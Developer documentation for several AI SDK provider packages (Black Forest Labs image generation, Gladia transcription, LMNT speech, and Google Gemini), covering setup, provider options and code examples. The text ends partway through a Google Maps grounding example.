Black Forest Labs provides a generative image platform for developers with FLUX-based models. Their platform offers fast, high quality, and in-context image generation and editing with precise and coherent results.
Setup
The Black Forest Labs provider is available via the @ai-sdk/black-forest-labs module. You can install it with:
pnpm add @ai-sdk/black-forest-labs
Provider Instance
You can import the default provider instance blackForestLabs from @ai-sdk/black-forest-labs:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
If you need a customized setup, you can import createBlackForestLabs and create a provider instance with your settings:
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
apiKey: 'your-api-key', // optional, defaults to BFL_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Black Forest Labs provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use a regional endpoint. The default prefix is https://api.bfl.ai/v1.
- apiKey string - API key that is sent using the x-key header. It defaults to the BFL_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
- pollIntervalMillis number - Interval in milliseconds between polling attempts when waiting for image generation to complete. Defaults to 500ms.
- pollTimeoutMillis number - Overall timeout in milliseconds for polling before giving up. Defaults to 60000ms (60 seconds).
Image Models
You can create Black Forest Labs image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { writeFileSync } from 'node:fs';
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: blackForestLabs.image('flux-pro-1.1'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Model Capabilities
Black Forest Labs offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Black Forest Labs Models Page.
| Model | Description |
|---|---|
| flux-kontext-pro | FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations |
| flux-kontext-max | FLUX.1 Kontext [max] with improved prompt adherence and typography generation |
| flux-pro-1.1-ultra | Ultra-fast, ultra high-resolution image creation |
| flux-pro-1.1 | Fast, high-quality image generation from text |
| flux-pro-1.0-fill | Inpainting model for filling masked regions of images with new content |
Black Forest Labs models support aspect ratios from 3:7 (portrait) to 7:3 (landscape).
Image Editing
Black Forest Labs Kontext models support powerful image editing capabilities using reference images. Pass input images via prompt.images to transform, combine, or edit existing images.
Single Image Editing
Transform an existing image using text prompts:
import {
blackForestLabs,
BlackForestLabsImageModelOptions,
} from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: blackForestLabs.image('flux-kontext-pro'),
prompt: {
text: 'A baby elephant with a shirt that has the logo from the input image.',
images: [
'https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png',
],
},
providerOptions: {
blackForestLabs: {
width: 1024,
height: 768,
} satisfies BlackForestLabsImageModelOptions,
},
});
Multi-Reference Editing
Combine multiple reference images for complex transformations. Black Forest Labs supports up to 10 input images:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: blackForestLabs.image('flux-kontext-pro'),
prompt: {
text: 'Combine the style of image 1 with the subject of image 2',
images: [
'https://example.com/style-reference.jpg',
'https://example.com/subject-reference.jpg',
],
},
});
Inpainting
The flux-pro-1.0-fill model supports inpainting, which allows you to fill masked regions of an image with new content. Pass the source image via prompt.images and a mask image via prompt.mask:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { images } = await generateImage({
model: blackForestLabs.image('flux-pro-1.0-fill'),
prompt: {
text: 'A beautiful garden with flowers',
images: ['https://example.com/source-image.jpg'],
mask: 'https://example.com/mask-image.png',
},
});
The mask image should be a grayscale image where white areas indicate regions to be filled and black areas indicate regions to preserve.
Provider Options
Black Forest Labs image models support flexible provider options through the providerOptions.blackForestLabs object. The supported parameters depend on the model ID used:
- width number - Output width in pixels (256–1920). When set, this overrides any width derived from size.
- height number - Output height in pixels (256–1920). When set, this overrides any height derived from size.
- outputFormat string - Desired format of the output image ("jpeg" or "png").
- steps number - Number of inference steps. Higher values may improve quality but increase generation time.
- guidance number - Guidance scale for generation. Higher values follow the prompt more closely.
- imagePrompt string - Base64-encoded image to use as additional visual context for generation.
- imagePromptStrength number - Strength of the image prompt influence on generation (0.0 to 1.0).
- promptUpsampling boolean - If true, performs upsampling on the prompt.
- raw boolean - Enable raw mode for more natural, authentic aesthetics.
- safetyTolerance number - Moderation level for inputs and outputs (0 = most strict, 6 = most permissive).
- pollIntervalMillis number - Interval in milliseconds between polling attempts (default 500ms).
- pollTimeoutMillis number - Overall timeout in milliseconds for polling before timing out (default 60s).
- webhookUrl string - URL for asynchronous completion notification. Must be a valid HTTP/HTTPS URL.
- webhookSecret string - Secret for webhook signature verification, sent in the X-Webhook-Secret header.
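A minimal sketch combining a few of these options (values are illustrative):
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { image } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
  providerOptions: {
    blackForestLabs: {
      width: 1280,
      height: 768,
      outputFormat: 'png',
      safetyTolerance: 2,
    },
  },
});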
Provider Metadata
The generateImage response includes provider-specific metadata in providerMetadata.blackForestLabs.images[]. Each image object may contain the following properties:
- seed number - The seed used for generation. Useful for reproducing results.
- start_time number - Unix timestamp when generation started.
- end_time number - Unix timestamp when generation completed.
- duration number - Generation duration in seconds.
- cost number - Cost of the generation request.
- inputMegapixels number - Input image size in megapixels.
- outputMegapixels number - Output image size in megapixels.
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: blackForestLabs.image('flux-pro-1.1'),
prompt: 'A serene mountain landscape at sunset',
});
// Access provider metadata
const metadata = providerMetadata?.blackForestLabs?.images?.[0];
console.log('Seed:', metadata?.seed);
console.log('Cost:', metadata?.cost);
console.log('Duration:', metadata?.duration);
Regional Endpoints
By default, requests are sent to https://api.bfl.ai/v1. You can select a regional endpoint by setting baseURL when creating the provider instance:
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
baseURL: 'https://api.eu.bfl.ai/v1', // or https://api.us.bfl.ai/v1
});
title: Gladia description: Learn how to use the Gladia provider for the AI SDK.
Gladia Provider
The Gladia provider contains language model support for the Gladia transcription API.
Setup
The Gladia provider is available in the @ai-sdk/gladia module. You can install it with:
pnpm add @ai-sdk/gladia
Provider Instance
You can import the default provider instance gladia from @ai-sdk/gladia:
import { gladia } from '@ai-sdk/gladia';
If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:
import { createGladia } from '@ai-sdk/gladia';
const gladia = createGladia({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Gladia provider instance:
- apiKey string - API key that is sent using the Authorization header. It defaults to the GLADIA_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Transcription Models
You can create models that call the Gladia transcription API
using the .transcription() factory method.
const model = gladia.transcription();
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarization option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { type GladiaTranscriptionModelOptions } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: gladia.transcription(),
audio: await readFile('audio.mp3'),
providerOptions: {
gladia: {
summarization: true,
} satisfies GladiaTranscriptionModelOptions,
},
});
The following provider options are available:
- contextPrompt string - Context to feed the transcription model with for potentially better accuracy. Optional.
- customVocabulary boolean | any[] - Custom vocabulary to improve transcription accuracy. Optional.
- customVocabularyConfig object - Configuration for custom vocabulary. Optional.
  - vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
  - defaultIntensity number
- detectLanguage boolean - Whether to automatically detect the language. Optional.
- enableCodeSwitching boolean - Enable code switching for multilingual audio. Optional.
- codeSwitchingConfig object - Configuration for code switching. Optional.
  - languages string[]
- language string - Specify the language of the audio. Optional.
- callback boolean - Enable callback when transcription is complete. Optional.
- callbackConfig object - Configuration for callback. Optional.
  - url string
  - method 'POST' | 'PUT'
- subtitles boolean - Generate subtitles from the transcription. Optional.
- subtitlesConfig object - Configuration for subtitles. Optional.
  - formats Array<'srt' | 'vtt'>
  - minimumDuration number
  - maximumDuration number
  - maximumCharactersPerRow number
  - maximumRowsPerCaption number
  - style 'default' | 'compliance'
- diarization boolean - Enable speaker diarization. Optional.
- diarizationConfig object - Configuration for diarization. Optional.
  - numberOfSpeakers number
  - minSpeakers number
  - maxSpeakers number
  - enhanced boolean
- translation boolean - Enable translation of the transcription. Optional.
- translationConfig object - Configuration for translation. Optional.
  - targetLanguages string[]
  - model 'base' | 'enhanced'
  - matchOriginalUtterances boolean
- summarization boolean - Enable summarization of the transcription. Optional.
- summarizationConfig object - Configuration for summarization. Optional.
  - type 'general' | 'bullet_points' | 'concise'
- moderation boolean - Enable content moderation. Optional.
- namedEntityRecognition boolean - Enable named entity recognition. Optional.
- chapterization boolean - Enable chapterization of the transcription. Optional.
- nameConsistency boolean - Enable name consistency in the transcription. Optional.
- customSpelling boolean - Enable custom spelling. Optional.
- customSpellingConfig object - Configuration for custom spelling. Optional.
  - spellingDictionary Record<string, string[]>
- structuredDataExtraction boolean - Enable structured data extraction. Optional.
- structuredDataExtractionConfig object - Configuration for structured data extraction. Optional.
  - classes string[]
- sentimentAnalysis boolean - Enable sentiment analysis. Optional.
- audioToLlm boolean - Enable audio to LLM processing. Optional.
- audioToLlmConfig object - Configuration for audio to LLM. Optional.
  - prompts string[]
- customMetadata Record<string, any> - Custom metadata to include with the request. Optional.
- sentences boolean - Enable sentence detection. Optional.
- displayMode boolean - Enable display mode. Optional.
- punctuationEnhanced boolean - Enable enhanced punctuation. Optional.
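Several features can be enabled together; a minimal sketch (configuration values are illustrative):
import { experimental_transcribe as transcribe } from 'ai';
import { gladia, type GladiaTranscriptionModelOptions } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    gladia: {
      diarization: true,
      diarizationConfig: { minSpeakers: 1, maxSpeakers: 3 },
      translation: true,
      translationConfig: { targetLanguages: ['fr'] },
    } satisfies GladiaTranscriptionModelOptions,
  },
});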
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| Default | | | | |
title: LMNT description: Learn how to use the LMNT provider for the AI SDK.
LMNT Provider
The LMNT provider contains speech model support for the LMNT speech synthesis API.
Setup
The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with:
pnpm add @ai-sdk/lmnt
Provider Instance
You can import the default provider instance lmnt from @ai-sdk/lmnt:
import { lmnt } from '@ai-sdk/lmnt';
If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:
import { createLMNT } from '@ai-sdk/lmnt';
const lmnt = createLMNT({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the LMNT provider instance:
- apiKey string - API key that is sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Speech Models
You can create models that call the LMNT speech API
using the .speech() factory method.
The first argument is the model id, e.g. aurora.
const model = lmnt.speech('aurora');
The voice parameter can be set to a voice ID from LMNT. You can find available voices in the LMNT documentation.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
const result = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hello, world!',
voice: 'ava',
language: 'en',
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
import { type LMNTSpeechModelOptions } from '@ai-sdk/lmnt';
const result = await generateSpeech({
model: lmnt.speech('aurora'),
text: 'Hello, world!',
voice: 'ava',
language: 'en',
providerOptions: {
lmnt: {
conversational: true,
speed: 1.2,
} satisfies LMNTSpeechModelOptions,
},
});
Provider Options
The LMNT provider accepts the following options via providerOptions.lmnt:
- format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav' - The audio format to return. Defaults to 'mp3'.
- sampleRate 8000 | 16000 | 24000 - The sample rate of the audio in Hz. Defaults to 24000.
- speed number - The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
- seed number - An optional seed for deterministic generation.
- conversational boolean - Whether to use a conversational style. Defaults to false. Does not work with the blizzard model.
- length number - Maximum length of the audio in seconds. Maximum value is 300. Does not work with the blizzard model.
- topP number - Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
- temperature number - Temperature parameter for sampling. Must be at least 0. Defaults to 1.
Model Capabilities
| Model | Instructions |
|---|---|
| aurora | |
| blizzard | |
title: Google description: Learn how to use Google Provider.
Google Provider
The Google provider contains language and embedding model support for the Google APIs.
Setup
The Google provider is available in the @ai-sdk/google module. You can install it with:
pnpm add @ai-sdk/google
Provider Instance
You can import the default provider instance google from @ai-sdk/google:
import { google } from '@ai-sdk/google';
If you need a customized setup, you can import createGoogle from @ai-sdk/google and create a provider instance with your settings:
import { createGoogle } from '@ai-sdk/google';
const google = createGoogle({
// custom settings
});
You can use the following optional settings to customize the Google provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
- apiKey string - API key that is sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
- generateId () => string - Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.
- name string - Custom provider name. Defaults to 'google.generative-ai'.
Language Models
You can create models that call the Google Generative AI API using the provider instance.
The first argument is the model id, e.g. gemini-2.5-flash.
The models support tool calls and some have multi-modal capabilities.
const model = google('gemini-2.5-flash');
You can use Google language models to generate text with the generateText function:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-2.5-flash'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Google language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Google also supports some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
const model = google('gemini-2.5-flash');
await generateText({
model,
providerOptions: {
google: {
safetySettings: [
{
category: 'HARM_CATEGORY_UNSPECIFIED',
threshold: 'BLOCK_LOW_AND_ABOVE',
},
],
} satisfies GoogleLanguageModelOptions,
},
});
The following optional provider options are available for Google models:
- cachedContent string - Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
- structuredOutputs boolean - Optional. Enable structured output. Default is true. This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google uses. You can use this to disable structured outputs if you need to. See Troubleshooting: Schema Limitations for more details.
- safetySettings Array<{ category: string; threshold: string }> - Optional. Safety settings for the model.
  - category string - The category of the safety setting. Can be one of the following: HARM_CATEGORY_UNSPECIFIED, HARM_CATEGORY_HATE_SPEECH, HARM_CATEGORY_DANGEROUS_CONTENT, HARM_CATEGORY_HARASSMENT, HARM_CATEGORY_SEXUALLY_EXPLICIT, HARM_CATEGORY_CIVIC_INTEGRITY
  - threshold string - The threshold of the safety setting. Can be one of the following: HARM_BLOCK_THRESHOLD_UNSPECIFIED, BLOCK_LOW_AND_ABOVE, BLOCK_MEDIUM_AND_ABOVE, BLOCK_ONLY_HIGH, BLOCK_NONE, OFF
- responseModalities string[] - The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text.
- thinkingConfig { thinkingLevel?: 'minimal' | 'low' | 'medium' | 'high'; thinkingBudget?: number; includeThoughts?: boolean } - Optional. Configuration for the model's thinking process. Only supported by specific Google models.
  - thinkingLevel 'minimal' | 'low' | 'medium' | 'high' - Optional. Controls the thinking depth for Gemini 3 models. Gemini 3.1 Pro supports 'low', 'medium', and 'high', Gemini 3 Pro supports 'low' and 'high', while Gemini 3 Flash supports all four levels: 'minimal', 'low', 'medium', and 'high'. Only supported by Gemini 3 models.
  - thinkingBudget number - Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Setting it to 0 disables thinking, if the model supports it. For more information about the possible value ranges for each model see the Google thinking documentation.
  - includeThoughts boolean - Optional. If set to true, thought summaries are returned, which are synthesized versions of the model's raw thoughts and offer insights into the model's internal reasoning process.
- imageConfig { aspectRatio?: string, imageSize?: string } - Optional. Configuration for the model's image generation. Only supported by specific Google models.
  - aspectRatio string - The model defaults to generating 1:1 squares, or to matching the output image size to that of your input image. Can be one of the following: 1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
  - imageSize string - Controls the output image resolution. Defaults to 1K. Can be one of the following: 1K, 2K, 4K
- audioTimestamp boolean - Optional. Enables timestamp understanding for audio-only files. See the Google Cloud audio understanding documentation.
- mediaResolution string - Optional. If specified, the media resolution specified will be used. Can be one of the following: MEDIA_RESOLUTION_UNSPECIFIED, MEDIA_RESOLUTION_LOW, MEDIA_RESOLUTION_MEDIUM, MEDIA_RESOLUTION_HIGH
- labels Record<string, string> - Optional. Defines labels used in billing reports. Available on Vertex AI only. See the Google Cloud labels documentation.
- serviceTier 'standard' | 'flex' | 'priority' - Optional. The service tier to use for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency. Set to 'priority' for ultra-low latency at a 75-100% price premium over 'standard'.
- threshold string - Optional. Standalone threshold setting that can be used independently of safetySettings. Uses the same values as the safetySettings threshold.
Thinking
The Gemini 2.5 and Gemini 3 series models use an internal "thinking process" that significantly improves their reasoning and multi-step planning abilities, making them highly effective for complex tasks such as coding, advanced mathematics, and data analysis. For more information see Google thinking documentation.
Gemini 3 Models
For Gemini 3 models, use the thinkingLevel parameter to control the depth of reasoning:
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = google('gemini-3.1-pro-preview');
const { text, reasoning } = await generateText({
model: model,
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
thinkingLevel: 'high',
includeThoughts: true,
},
} satisfies GoogleLanguageModelOptions,
},
});
console.log(text);
console.log(reasoning); // Reasoning summary
Gemini 2.5 Models
For Gemini 2.5 models, use the thinkingBudget parameter to control the number of thinking tokens:
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const model = google('gemini-2.5-flash');
const { text, reasoning } = await generateText({
model: model,
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
thinkingBudget: 8192,
includeThoughts: true,
},
} satisfies GoogleLanguageModelOptions,
},
});
console.log(text);
console.log(reasoning); // Reasoning summary
File Inputs
The Google provider supports file inputs, e.g. PDF files.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
import fs from 'node:fs';
const result = await generateText({
model: google('gemini-2.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
You can also use YouTube URLs directly:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const result = await generateText({
model: google('gemini-2.5-flash'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Summarize this video',
},
{
type: 'file',
data: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
mediaType: 'video/mp4',
},
],
},
],
});
See File Parts for details on how to use files in prompts.
Cached Content
Google supports both explicit and implicit caching to help reduce costs on repetitive content.
Implicit Caching
Gemini 2.5 models automatically provide cache cost savings without needing to create an explicit cache. When you send requests that share common prefixes with previous requests, you'll receive a 75% token discount on cached content.
To maximize cache hits with implicit caching:
- Keep content at the beginning of requests consistent
- Add variable content (like user questions) at the end of prompts
- Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
// Structure prompts with consistent content at the beginning
const baseContext =
'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';
const { text: veggieLasagna } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});
// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
model: google('gemini-2.5-pro'),
prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});
// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.google);
// e.g.
// {
// groundingMetadata: null,
// safetyRatings: null,
// usageMetadata: {
// cachedContentTokenCount: 2027,
// thoughtsTokenCount: 702,
// promptTokenCount: 2152,
// candidatesTokenCount: 710,
// totalTokenCount: 3564
// }
// }
Explicit Caching
For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models. See the models page to check if caching is supported for the model you use:
import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { GoogleGenAI } from '@google/genai';
import { generateText } from 'ai';
const ai = new GoogleGenAI({
apiKey: process.env.GOOGLE_GENERATIVE_AI_API_KEY,
});
const model = 'gemini-2.5-pro';
// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
model,
config: {
contents: [
{
role: 'user',
parts: [{ text: '1000 Lasagna Recipes...' }],
},
],
ttl: '300s', // Cache expires after 5 minutes
},
});
const { text: veggieLasagnaRecipe } = await generateText({
model: google(model),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
providerOptions: {
google: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
const { text: meatLasagnaRecipe } = await generateText({
model: google(model),
prompt: 'Write a meat lasagna recipe for 12 people.',
providerOptions: {
google: {
cachedContent: cache.name,
} satisfies GoogleLanguageModelOptions,
},
});
Code Execution
With Code Execution, certain models can generate and execute Python code to perform calculations, solve problems, or provide more accurate information.
You can enable code execution by adding the code_execution tool to your request.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, toolCalls, toolResults } = await generateText({
model: google('gemini-2.5-pro'),
tools: { code_execution: google.tools.codeExecution({}) },
prompt: 'Use python to calculate the 20th fibonacci number.',
});
The response will contain the tool calls and results from the code execution.
Google Search
With Google Search grounding, the model has access to the latest information using Google Search.
import { google } from '@ai-sdk/google';
import { GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
tools: {
google_search: google.tools.googleSearch({}),
},
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
The googleSearch tool accepts the following optional configuration options:
- searchTypes object - Enables specific search types. Both can be combined.
  - webSearch: Enable web search grounding (pass {} to enable). This is the default.
  - imageSearch: Enable image search grounding (pass {} to enable).
- timeRangeFilter object - Restricts search results to a specific time range. Both startTime and endTime are required.
  - startTime: Start time in ISO 8601 format (e.g. '2025-01-01T00:00:00Z').
  - endTime: End time in ISO 8601 format (e.g. '2025-12-31T23:59:59Z').
google.tools.googleSearch({
searchTypes: { webSearch: {} },
timeRangeFilter: {
startTime: '2025-01-01T00:00:00Z',
endTime: '2025-12-31T23:59:59Z',
},
});
When Google Search grounding is enabled, the model will include sources in the response.
Additionally, the grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:
- webSearchQueries (string[] | null)
  - Array of search queries used to retrieve information
  - Example: ["What's the weather in Chicago this weekend?"]
- searchEntryPoint ({ renderedContent: string } | null)
  - Contains the main search result content used as an entry point
  - The renderedContent field contains the formatted content
- groundingSupports (Array of support objects | null)
  - Contains details about how specific response parts are supported by search results
  - Each support object includes:
    - segment: Information about the grounded text segment
      - text: The actual text segment
      - startIndex: Starting position in the response
      - endIndex: Ending position in the response
    - groundingChunkIndices: References to supporting search result chunks
    - confidenceScores: Confidence scores (0-1) for each supporting chunk
Example response:
{
"groundingMetadata": {
"webSearchQueries": ["What's the weather in Chicago this weekend?"],
"searchEntryPoint": {
"renderedContent": "..."
},
"groundingSupports": [
{
"segment": {
"startIndex": 0,
"endIndex": 65,
"text": "Chicago weather changes rapidly, so layers let you adjust easily."
},
"groundingChunkIndices": [0],
"confidenceScores": [0.99]
}
]
}
}
Enterprise Web Search
With Enterprise Web Search, the model has access to a compliance-focused web index designed for highly regulated industries such as finance, healthcare, and the public sector.
import { createVertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';
const vertex = createVertex({
project: 'my-project',
location: 'us-central1',
});
const { text, sources, providerMetadata } = await generateText({
model: vertex('gemini-2.5-flash'),
tools: {
enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
},
prompt: 'What are the latest regulatory updates for financial services?',
});
Enterprise Web Search provides the following benefits:
- Does not log customer data
- Supports VPC service controls
- Compliance-focused web index for regulated industries
File Search
The File Search tool lets Gemini retrieve context from your own documents that you have indexed in File Search stores. Only Gemini 2.5 and Gemini 3 models support this feature.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: google('gemini-2.5-pro'),
tools: {
file_search: google.tools.fileSearch({
fileSearchStoreNames: [
'projects/my-project/locations/us/fileSearchStores/my-store',
],
metadataFilter: 'author = "Robert Graves"',
topK: 8,
}),
},
prompt: "Summarise the key themes of 'I, Claudius'.",
});
File Search responses include citations via the normal sources field and expose raw grounding metadata in providerMetadata.google.groundingMetadata.
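For example, you can list the cited documents from the sources array (a sketch; the title and id fields are assumptions based on the general AI SDK source shape):
// Sketch: log the documents the model cited from the File Search store.
for (const source of sources) {
  console.log('Cited source:', source.title ?? source.id);
}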
URL Context
Google provides a provider-defined URL context tool.
The URL context tool allows you to provide specific URLs directly in the prompt that you want the model to analyze.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
prompt: `Based on the document: https://ai.google.dev/gemini-api/docs/url-context.
Answer this question: How many links can we consume in one request?`,
tools: {
url_context: google.tools.urlContext({}),
},
});
const metadata = providerMetadata?.google as
| GoogleProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;
The URL context metadata includes detailed information about how the model used the URL context to generate the response. Here are the available fields:
- `urlMetadata` ({ retrievedUrl: string; urlRetrievalStatus: string; }[] | null) - Array of URL context metadata
  - Each object includes:
    - `retrievedUrl`: The URL of the context
    - `urlRetrievalStatus`: The status of the URL retrieval
Example response:
{
"urlMetadata": [
{
"retrievedUrl": "https://ai-sdk.dev/providers/ai-sdk-providers/google",
"urlRetrievalStatus": "URL_RETRIEVAL_STATUS_SUCCESS"
}
]
}
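You can use urlRetrievalStatus to detect URLs that could not be fetched. A minimal sketch using the urlContextMetadata variable from the example above:
// Sketch: warn about URLs the model failed to retrieve.
for (const entry of urlContextMetadata?.urlMetadata ?? []) {
  if (entry.urlRetrievalStatus !== 'URL_RETRIEVAL_STATUS_SUCCESS') {
    console.warn('Failed to retrieve:', entry.retrievedUrl);
  }
}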
With the URL context tool, you will also get the groundingMetadata.
"groundingMetadata": {
"groundingChunks": [
{
"web": {
"uri": "https://ai-sdk.dev/providers/ai-sdk-providers/google",
"title": "Google - AI SDK Providers"
}
}
],
"groundingSupports": [
{
"segment": {
"startIndex": 67,
"endIndex": 157,
"text": "**Installation**: Install the `@ai-sdk/google` module using your preferred package manager"
},
"groundingChunkIndices": [
0
]
}
]
}
}
You can add up to 20 URLs per request.
Combine URL Context with Search Grounding
You can combine the URL context tool with search grounding to provide the model with the latest information from the web.
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
prompt: `Based on this context: https://ai-sdk.dev/providers/ai-sdk-providers/google, tell me how to use Gemini with AI SDK.
Also, provide the latest news about AI SDK V5.`,
tools: {
google_search: google.tools.googleSearch({}),
url_context: google.tools.urlContext({}),
},
});
const metadata = providerMetadata?.google as
| GoogleProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;
Google Maps Grounding
With Google Maps grounding, the model has access to Google Maps data for location-aware responses. This enables providing local data and geospatial context, such as finding nearby restaurants.
import {
  google,
  type GoogleLanguageModelOptions,
  type GoogleProviderMetadata,
} from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-2.5-flash'),
tools: {
google_maps: google.tools.googleMaps({}),
},
providerOptions: {
google: {
retrievalConfig: {
latLng: { latitude: 34.090199, longitude: -117.881081 },
},
} satisfies GoogleLanguageModelOptions,
},
